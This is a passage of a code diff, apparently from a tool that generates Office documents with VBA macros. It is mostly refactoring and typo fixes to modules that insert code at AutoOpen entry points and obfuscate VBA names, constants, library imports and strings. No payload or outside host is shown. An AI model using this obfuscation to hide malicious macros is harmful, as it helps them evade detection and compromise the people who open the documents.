                 inputValues = shlex.split(valuesFileContent)# split on space but preserve what is between quotes
             else: 
                 inputValues = [valuesFileContent] # value where passed using -f option
@@ -138,7 +136,7 @@ def fillInputParams2(self, paramArray):
            
             if len(inputValues) >= mandatoryParamLen: 
                 i = 0  
-                # Fill entry parameterds
+                # Fill entry parameters
                 while i < len(inputValues):
                     paramArray[i].value = inputValues[i]
                     i += 1
@@ -146,7 +144,7 @@ def fillInputParams2(self, paramArray):
                         
         if not allMandatoryParamFilled:
             # if input was not provided
-            logging.warn("   [!] Could not find some mandatory input parameters. Please provide the next values:")
+            logging.warning("   [!] Could not find some mandatory input parameters. Please provide the next values:")
             for param in paramArray:
                 
                 if param.value is None or param.value == "" or param.value.isspace():
@@ -167,10 +165,10 @@ def getMainVBAFile(self):
         else:
             if self.startFunction is not None:
                 for vbaFile in vbaFiles:
-                    if  os.stat(vbaFile).st_size != 0:  
+                    if os.stat(vbaFile).st_size != 0:
                         with open(vbaFile, 'rb', 0) as file, mmap.mmap(file.fileno(), 0, access=mmap.ACCESS_READ) as s:
                             if s.find(self.startFunction.encode()) != -1:
-                                result  = vbaFile
+                                result = vbaFile
                                 break
                             
         return result
@@ -182,10 +180,10 @@ def getFileContainingString(self, strToFind):
         vbaFiles = self.getVBAFiles()
 
         for vbaFile in vbaFiles:
-            if  os.stat(vbaFile).st_size != 0:  
+            if os.stat(vbaFile).st_size != 0:
                 with open(vbaFile, 'rb', 0) as file, mmap.mmap(file.fileno(), 0, access=mmap.ACCESS_READ) as s:
                     if s.find(strToFind.encode()) != -1:
-                        result  = vbaFile
+                        result = vbaFile
                         break
                             
         return result
@@ -234,7 +232,6 @@ def addVBLib(self, vbaLib):
                     moduleContent = vbaLib.VBS
                 else:
                     moduleContent = vbaLib.VBA
-        #newModuleName = self.addVBAModule(moduleContent)
         newModuleName = self.addVBAModule(moduleContent, vbaLib.__name__)
         return newModuleName
     
@@ -250,7 +247,7 @@ def insertVbaCode(self, targetModule, targetFunction,targetLine, vbaCode):
         f.close()
         
         for n,line in enumerate(content):
-            matchObj = re.match( r'.*(Sub|Function)\s+%s\s*\(.*\).*'%targetFunction, line, re.M|re.I) 
+            matchObj = re.match(r'.*(Sub|Function)\s+%s\s*\(.*\).*' % targetFunction, line, re.M|re.I)
             if matchObj:  
                 logging.debug("     [,] Found " + targetFunction + " ") 
                 content[n+targetLine] = content[n+targetLine]+ vbaCode+"\n"
@@ -264,8 +261,7 @@ def insertVbaCode(self, targetModule, targetFunction,targetLine, vbaCode):
     
     
     def getAutoOpenFunction(self):
-        """ Return the VBA Function/Sub name which triggers autoopen for the current outputFileType """
-        result = ""
+        """ Return the VBA Function/Sub name which triggers auto open for the current outputFileType """
         if MSTypes.WD in self.outputFileType:
             result = "AutoOpen"
         elif MSTypes.XL in self.outputFileType:
diff --git a/src/modules/obfuscate_names.py b/src/modules/obfuscate_names.py
index bb7a2c2..ae03c6a 100644
--- a/src/modules/obfuscate_names.py
+++ b/src/modules/obfuscate_names.py
@@ -3,10 +3,11 @@
 
 import re
 from modules.mp_module import MpModule
-from common.utils import randomAlpha, extractStringsFromText
+from common.utils import extractStringsFromText, randomStringBasedOnCharset
 import logging
 from random import randint
-
+from random import choice
+import string
 
 class ObfuscateNames(MpModule):
 
@@ -23,14 +24,14 @@ def _findAllFunctions(self):
             f.close()
             
             for line in content:
-                matchObj = re.match( r'.*(Sub|Function)\s+([a-zA-Z0-9_]+)\s*\(.*\).*', line, re.M|re.I) 
+                matchObj = re.match(r'.*(Sub|Function)\s+([a-zA-Z0-9_]+)\s*\(.*\).*', line, re.M|re.I)
                 if matchObj:
                     keyword = matchObj.groups()[1]
                     if keyword not in self.reservedFunctions:
                         self.vbaFunctions.append(keyword)
                         self.reservedFunctions.append(keyword)
                 else:
-                    matchObj = re.match( r'.*(Sub|Function)\s+([a-zA-Z0-9_]+)\s*As\s*.*', line, re.M|re.I) 
+                    matchObj = re.match(r'.*(Sub|Function)\s+([a-zA-Z0-9_]+)\s*As\s*.*', line, re.M|re.I)
                     if matchObj:
                         keyword = matchObj.groups()[1]
                         if keyword not in self.reservedFunctions:
@@ -49,11 +50,11 @@ def _replaceFunctions(self):
         self._findAllFunctions()
         
         # Different situation surrounding variables
-        varDelimitors=[(" "," "),("\t"," "),("\t","("),("\t"," ="),(" ","("),("(","("),(" ","\n"),(" ",","),(" "," ="),("."," "),(".","\"")]
+        varDelimitors=[(" "," "),("\t"," "),("\t","("),("\t"," ="),(" ","("),(", ",")"),("AddressOf ",")"),("(","("),(" ","\n"),(" ",","),(" "," ="),("."," "),(".","\"")]
         
         # Replace functions and function calls by random string
         for keyWord in self.vbaFunctions:
-            keyTmp = randomAlpha(randint(8, 20)) # Generate random names with random size
+            keyTmp = self._generateRandomVbaName() # Generate random names with random size
             self.reservedFunctions.append(keyTmp)
         
             for vbaFile in self.getVBAFiles():
@@ -69,20 +70,7 @@ def _replaceFunctions(self):
                     keywordTmp = varDelimitor[0] + keyWord +varDelimitor[1]
 
                     for n,line in enumerate(content):
-                        #if "GetBuffer" in line:
-                        #if keyWord == "StrEncoder":
-                            #logging.info("|%s|->|%s|" %(keywordTmp,newKeyWord))
-                            #if keywordTmp in line:
-                            #    logging.info("line: %s" % (line))
-                            #    logging.info("Found %s, new keyword will be %s" % (keywordTmp,newKeyWord))
-                        
-                        
-                        extractedStrings=extractStringsFromText(line)  
-                        #if extractedStrings != "":
-                        #    logging.info(extractedStrings)    
-                        """
-                        matchObj = re.match( r'.*".*%s.*".*' %keyWord, line, re.M|re.I) # check if word is inside a string
-                        if matchObj:"""
+                        extractedStrings=extractStringsFromText(line)
                         if keyWord in extractedStrings:
                             if "Application.Run" in line or "Application.OnTime" in line: # dynamic function call detected
                                 content[n] = line.replace(keywordTmp, newKeyWord)
@@ -95,12 +83,21 @@ def _replaceFunctions(self):
                 f.close()
 
 
+    def _generateRandomVbaName(self):
+        """
+        Generate random names with random size
+        :return:
+        """
+        vbaName = choice(string.ascii_lowercase) # Name has to start with a letter
+        return vbaName + randomStringBasedOnCharset(randint(self.mpSession.obfuscatedNamesMinLen - 1, self.mpSession.obfuscatedNamesMaxLen - 1), self.mpSession.obfuscatedNamesCharset)
+
+
     def _replaceLibImports(self, macroLines):
         
         # Identify function, subs and variables names
         keyWords = []
         for line in macroLines:
-            matchObj = re.match( r'.*(Sub|Function)\s*([a-zA-Z0-9_]+)\s*Lib\s*"(.+)"\s*.*', line, re.M|re.I) 
+            matchObj = re.match(r'.*(Sub|Function)\s*([a-zA-Z0-9_]+)\s*Lib\s*"(.+)"\s*.*', line, re.M|re.I)
             if matchObj:
                 keyword = matchObj.groups()[1]
                 keyWords.append(keyword)
@@ -111,7 +108,7 @@ def _replaceLibImports(self, macroLines):
         # Replace functions and function calls by random string
         for keyWord in keyWords:
             
-            keyTmp = randomAlpha(randint(8, 20)) # Generate random names with random size
+            keyTmp = self._generateRandomVbaName()
             #logging.debug("Keyword:%s,keyTmp:%s "%(keyWord,keyTmp))
             for n,line in enumerate(macroLines):
                 if "Lib " in line and keyWord + " " in line: # take care of declaration
@@ -121,35 +118,31 @@ def _replaceLibImports(self, macroLines):
                         #logging.debug(macroLines[n])
                     else:
                         # We have to create a new alias
-                        matchObj = re.match( r'.*(Sub|Function)\s*([a-zA-Z0-9_]+)\s*Lib\s*"(.+)"(\s*).*', line, re.M|re.I) 
+                        matchObj = re.match(r'.*(Sub|Function)\s*([a-zA-Z0-9_]+)\s*Lib\s*"(.+)"(\s*).*', line, re.M|re.I)
                         #logging.debug(line)
                         line =  line.replace(" %s " % keyWord, " %s " % keyTmp)
                         #logging.debug(line+"\n")
                         macroLines[n] = line.replace(matchObj.groups()[2],matchObj.groups()[2] + "\" Alias \"%s" % keyWord) 
                 else:
-                    matchObj = re.match( r'.*".*%s.*".*'%keyWord, line, re.M|re.I) # check if word is inside a string
+                    matchObj = re.match(r'.*".*%s.*".*' % keyWord, line, re.M|re.I) # check if word is inside a string
                     if matchObj:
                         if "Application.Run" in line: # dynamic function call detected
                             macroLines[n] = line.replace(keyWord, keyTmp)
                             
-                        # else word is part of normal string so we do not touch
+                        # else word is part of normal string, so we do not touch
                     else:
                         if keyWord + " " in line or keyWord + "(" in line:
-                            #logging.debug(line)
                             macroLines[n] = line.replace(keyWord, keyTmp)
-                            #logging.debug(macroLines[n])
-                        #else:
-                        #    macroLines[n] = line.replace(keyWord, keyTmp)
         return macroLines
 
 
     def _replaceVariables(self,macroLines):
         
-        #  variables names
+        #  will contain variables names
         keyWords = []
         # format something As ...
         for line in macroLines:
-            findList = re.findall( r'([a-zA-Z0-9_]+)(\(\))?\s+As\s+(String|Integer|Long|Object|Byte|Variant|Boolean|Single|Any|Collection|Word.Application|Excel.Application)', line, re.I) 
+            findList = re.findall(r'([a-zA-Z0-9_]+)(\(\))?\s+As\s+(String|Integer|Long|Object|Byte|Variant|Boolean|Single|Any|Collection|Word.Application|Excel.Application|VbVarType)', line, re.I)
             if findList:
                 for keyWord in findList:
                     if keyWord[0] not in self.reservedFunctions: # prevent erase of previous variables and function names
@@ -157,7 +150,7 @@ def _replaceVariables(self,macroLines):
                         self.reservedFunctions.append(keyWord[0])
         # format Set <something> =  ...
         for line in macroLines:
-            findList = re.findall( r'Set\s+([a-zA-Z0-9_]+)\s+=', line, re.I) 
+            findList = re.findall(r'Set\s+([a-zA-Z0-9_]+)\s+=', line, re.I)
             if findList:
                 for keyWord in findList:
                     if keyWord not in self.reservedFunctions:  # prevent erase of previous variables and function names
@@ -165,7 +158,7 @@ def _replaceVariables(self,macroLines):
                         self.reservedFunctions.append(keyWord)
         # format Const <something> =  ...
         for line in macroLines:
-            findList = re.findall( r'Const\s+([a-zA-Z0-9_]+)\s+=', line, re.I) 
+            findList = re.findall(r'Const\s+([a-zA-Z0-9_]+)\s+=', line, re.I)
             if findList:
                 for keyWord in findList:
                     if keyWord not in self.reservedFunctions:  # prevent erase of previous variables and function names
@@ -173,7 +166,7 @@ def _replaceVariables(self,macroLines):
                         self.reservedFunctions.append(keyWord)
         # format Type <something>
         for line in macroLines:
-            findList = re.findall( r'Type\s+([a-zA-Z0-9_]+)$', line, re.I) 
+            findList = re.findall(r'Type\s+([a-zA-Z0-9_]+)$', line, re.I)
             if findList:
                 for keyWord in findList:
                     if keyWord not in self.reservedFunctions:  # prevent erase of previous variables and function names
@@ -192,25 +185,25 @@ def _replaceVariables(self,macroLines):
         
         # replace all keywords by random name
         for keyWord in keyWords:
-            keyTmp = randomAlpha(randint(8, 20)) # Generate random names with random size
+            keyTmp = self._generateRandomVbaName()
             #logging.info("|%s|->|%s|" %(keyWord,keyTmp))
             for varDelimitor in varDelimitors:
-                newKeyWord = varDelimitor[0] + keyTmp +varDelimitor[1]
-                keywordTmp = varDelimitor[0] + keyWord +varDelimitor[1]
+                newKeyWord = varDelimitor[0] + keyTmp + varDelimitor[1]
+                keywordTmp = varDelimitor[0] + keyWord + varDelimitor[1]
                 for n,line in enumerate(macroLines):
                     macroLines[n] = line.replace(keywordTmp, newKeyWord)
                 
         return macroLines
 
 
-    def _replaceConsts(self,macroLines):
-        
+    def _replaceConsts(self, macroLines):
+
         # Identify and replace constants
         constList = ["0","1", "2"]
         
         for constant in constList:
             # Create random string to replace constant 
-            keyTmp = randomAlpha(10)
+            keyTmp = self._generateRandomVbaName()
             constDeclaration = "Const " + keyTmp +" = " + constant + "\n"
             macroLines.insert(0, constDeclaration)
             newKeyWord = " " + keyTmp + ", "
@@ -237,7 +230,7 @@ def run(self):
    
         # Obfuscate function name
         logging.info("   [-] Rename functions...")
-        content = self._replaceFunctions()
+        self._replaceFunctions()
         
         logging.info("   [-] Rename variables...")
         if self.mpSession.ObfReplaceConstants:
@@ -256,9 +249,9 @@ def run(self):
             if self.mpSession.ObfReplaceConstants:
                 # replace numerical consts
                 if ",0," in content or " 0," in content:
-                    content = self._replaceConsts (content)
+                    content = self._replaceConsts(content)
             #replace lib imports
-            content = self._replaceLibImports (content)
+            content = self._replaceLibImports(content)
         
             # Write in new file 
             f = open(vbaFile, 'w')
diff --git a/src/modules/obfuscate_strings.py b/src/modules/obfuscate_strings.py
index 442df62..8d76541 100644
--- a/src/modules/obfuscate_strings.py
+++ b/src/modules/obfuscate_strings.py
@@ -69,6 +69,12 @@ def run(self):
         logging.info("   [-] Split strings...")
         logging.info("   [-] Encode strings...")
         for vbaFile in self.getVBAFiles():
+            # Check if there are strings in file
+            with open(vbaFile) as fileToCheck:
+                data = fileToCheck.read()
+            if '"' not in data:
+                continue
+            
             # Compute new random function and variable names for HexToStr
             newFunctionName = randomAlpha(12)
             newVarName1 = randomAlpha(12)
diff --git a/src/modules/payload_builder.py b/src/modules/payload_builder.py
index 4ed7f23..ed8ed06 100644
--- a/src/modules/payload_builder.py
+++ b/src/modules/payload_builder.py
@@ -9,24 +9,16 @@ class PayloadBuilder(MpModule):
     
     def __init__(self,mpSession):
         self.embeddedFilePath = mpSession.embeddedFilePath
-        super().__init__(mpSession)    
-    
-    
-        
-    def embedFile(self):
-        """
-        Embed the content of  self.embeddedFilePath inside the generated target file
-        """
-        raise NotImplementedError
+        super().__init__(mpSession)
     
     
     def generate(self):
         """ Generate the targeted file """
         raise NotImplementedError
-    
+
+
     def check(self):
-        """ Verify generation feasability return true if ok, false if not"""
-        
+        """ Verify generation feasibility return true if ok, false if not"""
         raise NotImplementedError
     
     
@@ -49,7 +41,7 @@ def processDosCommandLine(self,commandLine):
     def run(self):
         
         logging.info(" [+] Prepare %s file generation..." % self.outputFileType)
-        # Check feasability
+        # Check feasibility
         if not self.check():
             return
         
diff --git a/src/modules/vba_gen.py b/src/modules/vba_gen.py
index 2b85cd4..1a594c1 100644
--- a/src/modules/vba_gen.py
+++ b/src/modules/vba_gen.py
@@ -93,7 +93,7 @@ def resetVBAEntryPoint(self):
                 #1 Replace line in VBA
                 f = open(mainFile)
                 content = f.readlines()
-                f.close
+                f.close()
                 for n,line in enumerate(content):
                     if line.find(" " + self.startFunction) != -1:  
                         #logging.info("     -> %s becomes %s" %(content[n], self.getAutoOpenVbaSignature()))